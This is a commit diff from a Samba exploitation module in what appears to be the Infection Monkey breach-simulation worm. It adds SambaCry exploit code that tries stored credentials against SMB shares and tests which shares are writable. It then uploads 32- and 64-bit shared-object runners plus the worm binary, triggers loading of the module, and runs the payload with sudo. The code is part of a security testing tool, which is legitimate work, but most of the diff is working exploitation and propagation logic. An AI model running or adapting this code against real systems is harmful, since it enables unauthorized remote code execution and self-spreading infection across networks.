sambacry: Add support for using both architectures

2017-08-30 10:16:54 +03:00 · 2017-08-30 10:16:54 +03:00 · 4ce1653c8f
parent 75e1877ea7
commit 4ce1653c8f
4 changed files with 171 additions and 63 deletions
--- a/chaos_monkey/exploit/sambacry.py
+++ b/chaos_monkey/exploit/sambacry.py
@ -1,6 +1,7 @@
 from optparse import OptionParser
 from impacket.dcerpc.v5 import transport
 from os import path
+import time
 from impacket.smbconnection import SMBConnection
 from impacket.smb import SessionError
 from impacket.nt_errors import STATUS_OBJECT_NAME_NOT_FOUND, STATUS_ACCESS_DENIED
@ -9,78 +10,163 @@ from impacket.smb import FILE_OPEN, SMB_DIALECT, SMB, SMBCommand, SMBNtCreateAnd
    FILE_READ_DATA, FILE_SHARE_READ, FILE_NON_DIRECTORY_FILE, FILE_WRITE_DATA, FILE_DIRECTORY_FILE
 from impacket.smb3structs import SMB2_IL_IMPERSONATION, SMB2_CREATE, SMB2_FLAGS_DFS_OPERATIONS, SMB2Create, SMB2Packet, \
    SMB2Create_Response, SMB2_OPLOCK_LEVEL_NONE, SMB2_SESSION_FLAG_ENCRYPT_DATA
+
+from exploit import HostExploiter
+from exploit.tools import get_target_monkey
+from smbfinger import SMB_SERVICE
+from model import DROPPER_ARG
+from tools import build_monkey_commandline
+import monkeyfs
+from config import WormConfiguration
+
 __author__ = 'itay.mizeretz'

 # TODO: add documentation
-# TODO: add author
 # TODO: add logs
-# TODO: add exception handling
+
+# TODO: add license credit?: https://github.com/CoreSecurity/impacket/blob/master/examples/sambaPipe.py

 # TODO: remove /home/user
 # TODO: take all from config
-FOLDER_PATHS_TO_GUESS = ['/mnt', '/tmp', '/storage', '/export', '/share', '/shares', '', '/home/user']
-RUNNER_FILENAME = "monkey_runner.so"
+FOLDER_PATHS_TO_GUESS = ['', '/mnt', '/tmp', '/storage', '/export', '/share', '/shares', '/home', '/home/user']
+RUNNER_FILENAME_32 = "monkey_runner32.so"
+RUNNER_FILENAME_64 = "monkey_runner64.so"
 COMMANDLINE_FILENAME = "monkey_commandline.txt"
-MONKEY_FILENAME = "monkey"
+MONKEY_FILENAME_32 = "monkey32"
+MONKEY_FILENAME_64 = "monkey64"
+MONKEY_COPY_FILENAME_32 = "monkey32_2"
+MONKEY_COPY_FILENAME_64 = "monkey64_2"
+SHARES_TO_NOT_CHECK = ["IPC$", "print$"]


-def main():
-    parser = OptionParser()
-    parser.add_option("-t", "--target", dest="target")
-
-    (options, args) = parser.parse_args()
-    if options.target:
-        exploiter = SambaCryExploiter()
-        exploiter.exploit(options.target)
-    else:
-        parser.print_help()
-
-# TODO: inherit from HostExploiter
-class SambaCryExploiter:
+class SambaCryExploiter(HostExploiter):
    _target_os_type = ['linux']

    def __init__(self):
-        self.module_binary = ""
+        pass

-    def exploit(self, ip):
-        self.assert_smb_version()
-        writable_shares = []
+    def exploit_host(self, host, depth=-1, src_path=None):
+        self.is_vulnerable(host)
+
+        writable_shares_creds_dict = self.get_writable_shares_creds_dict(host.ip_addr)
+
+        # TODO: decide about ignoring src_path because of arc detection bug
+        src_path = src_path or get_target_monkey(host)
+
+        for share in writable_shares_creds_dict:
+            self.try_exploit_share(host, share, writable_shares_creds_dict[share], src_path, depth)
+
+        # TODO: config sleep time
+        time.sleep(5)
+
+        for share in writable_shares_creds_dict:
+            self.clean_share(host.ip_addr, share, writable_shares_creds_dict[share])
+
+    def try_exploit_share(self, host, share, creds, monkey_bin_src_path, depth):
+        smb_client = self.connect_to_server(host.ip_addr, creds)
+        self.upload_module(smb_client, host, share, monkey_bin_src_path, depth)
+        self.trigger_module(smb_client, share)
+        smb_client.logoff()
+
+    def clean_share(self, ip, share, creds):
+        smb_client = self.connect_to_server(ip, creds)
+        tree_id = smb_client.connectTree(share)
+        file_list = [COMMANDLINE_FILENAME, RUNNER_FILENAME_32, RUNNER_FILENAME_64,
+                     MONKEY_FILENAME_32, MONKEY_FILENAME_64,
+                     MONKEY_COPY_FILENAME_32, MONKEY_COPY_FILENAME_64]
+
+        for filename in file_list:
+            try:
+                smb_client.deleteFile(share, "\\%s" % filename)
+            except:
+                # Ignore exception to try and delete as much as possible
+                pass
+        smb_client.disconnectTree(tree_id)
+        smb_client.logoff()
+
+    def get_writable_shares_creds_dict(self, ip):
+        # TODO: document
+        writable_shares_creds_dict = {}
        credentials_list = self.get_credentials_list()
+
        for credentials in credentials_list:
            smb_client = self.connect_to_server(ip, credentials)
            shares = self.list_shares(smb_client)
+
+            # don't try shares we can already write to.
+            for writable_share in writable_shares_creds_dict:
+                if writable_share in shares:
+                    shares.remove(writable_share)
+
            for share in shares:
-                if self.upload_module(smb_client, share):
-                    writable_shares.append(share)
-                    self.trigger_module(smb_client, share)
-                # TODO: delete remains
+                if self.is_share_writable(smb_client, share):
+                    writable_shares_creds_dict[share] = credentials
+
            smb_client.logoff()

+        return writable_shares_creds_dict
+
    def get_credentials_list(self):
-        # TODO: get credentials from config
-        return [{'username': '', 'password': '', 'lm_hash': '', 'ntlm_hash': ''}]
+        user_password_pairs = WormConfiguration.get_exploit_user_password_pairs()
+        credentials_list = [{'username': '', 'password': '', 'lm_hash': '', 'ntlm_hash': ''}]
+
+        for user, password in user_password_pairs:
+            credentials_list.append({'username': user, 'password': password, 'lm_hash': '', 'ntlm_hash': ''})
+
+        return credentials_list

    def list_shares(self, smb_client):
        shares = [x['shi1_netname'][:-1] for x in smb_client.listShares()]
-        shares.remove("IPC$")
+        for share in SHARES_TO_NOT_CHECK:
+            if share in shares:
+                shares.remove(share)
+
        return shares

-    def assert_smb_version(self):
-        # TODO: implement
-        pass
+    def is_vulnerable(self, host):
+        if not host.services.has_key(SMB_SERVICE):
+            return False
+        # TODO: check if version is supported
+        # smb_server_name = host.services[SMB_SERVICE].get('name')

-    def upload_module(self, smb_client, share):
+        return True
+
+    def is_share_writable(self, smb_client, share):
+        # TODO: logs
+        #logging.debug('Checking %s for write access' % shareName)
        try:
+            #logging.debug('Connecting to share %s' % shareName)
            tree_id = smb_client.connectTree(share)
-            smb_client.putFile(share, "\\%s" % COMMANDLINE_FILENAME, self.get_monkey_commandline)
-            smb_client.putFile(share, "\\%s" % RUNNER_FILENAME, self.get_monkey_runner_bin)
-            smb_client.putFile(share, "\\%s" % MONKEY_FILENAME, self.get_monkey_bin)
-            smb_client.disconnectTree(tree_id)
-            return True
-        except SessionError as e:
-            if str(e).find('STATUS_ACCESS_DENIED') >= 0:
-                return False
-            raise
+        except Exception as e:
+            return False
+
+        try:
+            smb_client.openFile(tree_id, '\\', FILE_WRITE_DATA, creationOption=FILE_DIRECTORY_FILE)
+            writable = True
+        except Exception as e:
+            writable = False
+            pass
+
+        smb_client.disconnectTree(tree_id)
+
+        return writable
+
+    def upload_module(self, smb_client, host, share, monkey_bin_src_path, depth):
+        tree_id = smb_client.connectTree(share)
+        self.write_file_to_server(smb_client, share, COMMANDLINE_FILENAME, self.get_monkey_commandline_supplier(host, depth))
+        with self.get_monkey_runner_bin_file(True) as monkey_runner_bin_file:
+            self.write_file_to_server(smb_client, share, RUNNER_FILENAME_32, monkey_runner_bin_file.read)
+        with self.get_monkey_runner_bin_file(False) as monkey_runner_bin_file:
+            self.write_file_to_server(smb_client, share, RUNNER_FILENAME_64, monkey_runner_bin_file.read)
+        with monkeyfs.open(monkey_bin_src_path, "rb") as monkey_bin_file:
+            # TODO: Fix or postpone 32/64 architecture problem.
+            self.write_file_to_server(smb_client, share, MONKEY_FILENAME_32, monkey_bin_file.read)
+            self.write_file_to_server(smb_client, share, MONKEY_FILENAME_64, monkey_bin_file.read)
+        smb_client.disconnectTree(tree_id)
+
+    def write_file_to_server(self, smb_client, share, file_name, file_handle):
+        smb_client.putFile(share, "\\%s" % file_name, file_handle.read)
+        file_handle.close()

    def connect_to_server(self, ip, credentials):
        """
@ -119,29 +205,31 @@ class SambaCryExploiter:

        return True

-
-    def generate_module_possible_paths(self, share_name):
+    @staticmethod
+    def generate_module_possible_paths(share_name):
        """
        Generates array of possible paths
        :param share_name:  Name of the share
        :return:            Array of possible full paths to the module.
        """
-        return (('%s/%s/%s' % (folder_path, share_name, RUNNER_FILENAME)) for folder_path in FOLDER_PATHS_TO_GUESS)
+        possible_paths_32 =\
+            (('%s/%s/%s' % (folder_path, share_name, RUNNER_FILENAME_32)) for folder_path in FOLDER_PATHS_TO_GUESS)
+        possible_paths_64 = \
+            (('%s/%s/%s' % (folder_path, share_name, RUNNER_FILENAME_64)) for folder_path in FOLDER_PATHS_TO_GUESS)
+        return possible_paths_32 + possible_paths_64

    @staticmethod
-    def get_monkey_bin():
-        # TODO
-        pass
+    def get_monkey_runner_bin_file(is_32bit):
+        # TODO: get from config
+        if is_32bit:
+            return open("sc_monkey_runner32.so", "rb")
+        else:
+            return open("sc_monkey_runner64.so", "rb")
+

    @staticmethod
-    def get_monkey_runner_bin():
-        # TODO
-        pass
-
-    @staticmethod
-    def get_monkey_commandline():
-        # TODO
-        pass
+    def get_monkey_commandline_supplier(host, depth):
+        return lambda x: DROPPER_ARG + build_monkey_commandline(host, depth - 1)

    # Following are slightly modified SMB functions from impacket to fit our needs of the vulnerability #

@ -224,7 +312,4 @@ class SambaCryExploiter:
            return smb_client.getSMBServer().nt_create_andx(treeId, pathName, cmd=ntCreate)
        else:
            return self.createSmb(smb_client, treeId, pathName, desiredAccess=FILE_READ_DATA, shareMode=FILE_SHARE_READ,
-                                  creationOptions=FILE_OPEN, creationDisposition=FILE_NON_DIRECTORY_FILE, fileAttributes=0)
-
-if __name__=="__main__":
-    main()
+                                  creationOptions=FILE_OPEN, creationDisposition=FILE_NON_DIRECTORY_FILE, fileAttributes=0)
--- a/chaos_monkey/monkey-linux.spec
+++ b/chaos_monkey/monkey-linux.spec
@ -14,6 +14,10 @@ a = Analysis(['main.py'],
             win_no_prefer_redirects=None,
             win_private_assemblies=None,
             cipher=block_cipher)
+             
+a.binaries  += [('sc_monkey_runner32.so', '.\\bin\\sc_monkey_runner32.so', 'BINARY')]
+a.binaries  += [('sc_monkey_runner64.so', '.\\bin\\sc_monkey_runner64.so', 'BINARY')]
+             
 pyz = PYZ(a.pure, a.zipped_data,
             cipher=block_cipher)
 exe = EXE(pyz,
--- a/chaos_monkey/monkey.spec
+++ b/chaos_monkey/monkey.spec
@ -7,6 +7,10 @@ a = Analysis(['main.py'],
             hookspath=None,
             runtime_hooks=None)

+             
+a.binaries  += [('sc_monkey_runner32.so', '.\\bin\\sc_monkey_runner32.so', 'BINARY')]
+a.binaries  += [('sc_monkey_runner64.so', '.\\bin\\sc_monkey_runner64.so', 'BINARY')]
+
 if platform.system().find("Windows")>= 0:
    a.datas = [i for i in a.datas if i[0].find('Include') < 0]
    if platform.architecture()[0] == "32bit":
--- a/chaos_monkey/monkey_utils/sambacry_monkey_runner/monkey_runner.c
+++ b/chaos_monkey/monkey_utils/sambacry_monkey_runner/monkey_runner.c
@ -6,16 +6,31 @@

 #include "monkey_runner.h"

+#if __x86_64__
+	#define ARC_IS_64
+#endif
+
+#if _____LP64_____
+	#define ARC_IS_64
+#endif
+
 #define LINE_MAX_LENGTH (2048)
 #define MAX_PARAMETERS (30)

 int samba_init_module(void)
 {
-	const char RUNNER_FILENAME[] = "monkey_runner.so";
+#if ARC_IS_64
+	const char RUNNER_FILENAME[] = "monkey_runner64.so";
+	const char MONKEY_NAME[] = "monkey64";
+	const char MONKEY_COPY_NAME[] = "monkey64_2";
+#else
+	const char RUNNER_FILENAME[] = "monkey_runner32.so";
+	const char MONKEY_NAME[] = "monkey32";
+	const char MONKEY_COPY_NAME[] = "monkey32_2";
+#endif
+
 	const char COMMANDLINE_FILENAME[] = "monkey_commandline.txt";
 	const char ACCESS_MODE_STRING[] = "0777";
-	const char MONKEY_NAME[] = "monkey";
-	const char MONKEY_COPY_NAME[] = "monkey2";
 	const char RUN_MONKEY_CMD[] = "sudo ./";
 	
 	int found = 0;